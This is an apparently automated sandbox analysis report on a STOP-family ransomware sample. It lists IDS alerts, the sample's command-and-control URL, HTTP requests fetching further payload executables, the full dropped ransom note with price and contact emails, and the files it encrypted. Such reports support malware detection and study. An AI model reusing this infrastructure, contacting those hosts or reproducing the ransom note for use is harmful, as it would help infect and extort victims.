        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98

        Networking

        Source: Network traffic Suricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52651 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:49717 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036334 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key : 192.168.2.6:52650 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52641 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52646 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Malware configuration extractor URLs: http://asvb.top/nddddhsspen6/get.php
        Source: Joe Sandbox View IP Address: 188.114.97.3
        Source: Joe Sandbox View IP Address: 92.246.89.93
        Source: Joe Sandbox View ASN Name: LIVECOMM-ASRespublikanskayastr3k6RU
        Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52651 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52641 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52650 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52645 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52640 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52646 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 188.114.97.3:443
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52638 -> 188.114.97.3:443
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52636 -> 188.114.97.3:443
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 188.114.97.3:443
        Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 188.114.97.3:443
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Code function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
        Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
        Source: global traffic HTTP traffic detected: GET /files/penelop/updatewin1.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /files/penelop/updatewin2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /files/penelop/updatewin.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /files/penelop/3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /files/penelop/4.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic HTTP traffic detected: GET /files/penelop/5.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: asvb.top
        Source: global traffic DNS traffic detected: DNS query: api.2ip.ua
        Source: global traffic DNS traffic detected: DNS query: asvb.top
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
        Source: wct425E.tmp.7.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: wct425E.tmp.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co
        Source: wct425E.tmp.7.drString found in binary or memory: https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.
        Source: prep_foundation_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://github.com/react-native-async-storage/async-storage/issues
        Source: V0100005.log.7.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
        Source: V01tmp.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
        Source: prep_foundation_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://react-native-async-storage.github.io/async-storage/docs/advanced/jest
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.officX
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.ne
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-TVrnNufM
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000806000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.000000000080B000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.7.dr, _readme.txt2.7.dr, _readme.txt0.7.dr, _readme.txt1.7.drString found in binary or memory: https://we.tl/t-TVrnNufMGq
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-TVrnNufMu
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52638
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52636
        Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 52638 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 52636 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52636 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52638 version: TLS 1.2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Code function: 2_2_004822E0 CreateDCA, CreateCompatibleDC, GetDeviceCaps, GetDeviceCaps, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, GetObjectA, BitBlt, GetBitmapBits, SelectObject, DeleteObject, DeleteDC, DeleteDC, DeleteDC

        Spam, unwanted Advertisements and Ransom Demands

        Source: C:\_readme.txt Dropped file: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-TVrnNufMGq Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: helpteam@mail.ch Reserve e-mail address to contact us: helpmanager@airmail.cc Your personal ID: 0296Sirj3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File moved: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docx
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File deleted: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docx
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File moved: C:\Users\user\Desktop\BNAGMGSPLO.jpg
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File deleted: C:\Users\user\Desktop\BNAGMGSPLO.jpg
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File moved: C:\Users\user\Desktop\IPKGELNTQY.xlsx
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File dropped: C:\_readme.txt, C:\$WinREAgent\_readme.txt, C:\$WinREAgent\Scratch\_readme.txt, C:\Users\user\_readme.txt -> decrypt tool and unique key for you. this software will decrypt all your encrypted files. what guarantees you have? you can send one of your encrypted file from your pc and we decrypt it for free. but we can decrypt only 1 file for free. file must not contain valuable information. you can get and look video overview decrypt tool: https://we.tl/t-tvrnnufmgq price of private key and decrypt software is $980. discount 50% available if you contact us first 72 hours, that's price for you is $490. please note that you'll never restore your data without payment. check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours. to get this software you need write on our e-mail: helpteam@mail.ch reserve e-mail address to contact us: helpmanager@airmail.cc your personal id: 0296sirj3pndlh1399769yerbbkcxhurraqlhaxsgw3fbkt1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99813683887
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99857750415
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99780866643
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99736752943
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99612049432
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99388868447
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99706977892
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99486152292
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99125522937
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99457472683
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99591413099
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99189983616
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99711062743
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99222537094
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99748799195
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99131924207
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99291716786
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.99323100473
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99740611016
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe entropy: 7.99845675525
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0824.log entropy: 7.99486692556
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db entropy: 7.99006634322
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db entropy: 7.99805481438
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99802733337
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99796305834
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\jusched.log entropy: 7.99496288007
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.9931580516
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.9970465457
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm entropy: 7.99143504067
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99678400715
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.9976355692
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99275184488
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.pcqq (copy) entropy: 7.99323100473
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.pcqq (copy) entropy: 7.99740611016
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy) entropy: 7.99845675525
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\user-PC-20231005-0824.log.pcqq (copy) entropy: 7.99486692556
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\jusched.log.pcqq (copy) entropy: 7.99496288007
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\offline.session64.pcqq (copy) entropy: 7.9970465457
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\wct1CF4.tmp.pcqq (copy) entropy: 7.99692079345
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\wct4F77.tmp.pcqq (copy) entropy: 7.99727123062
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\wct7BEC.tmp.pcqq (copy) entropy: 7.99749234057
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\wctCDBF.tmp.pcqq (copy) entropy: 7.99763604498
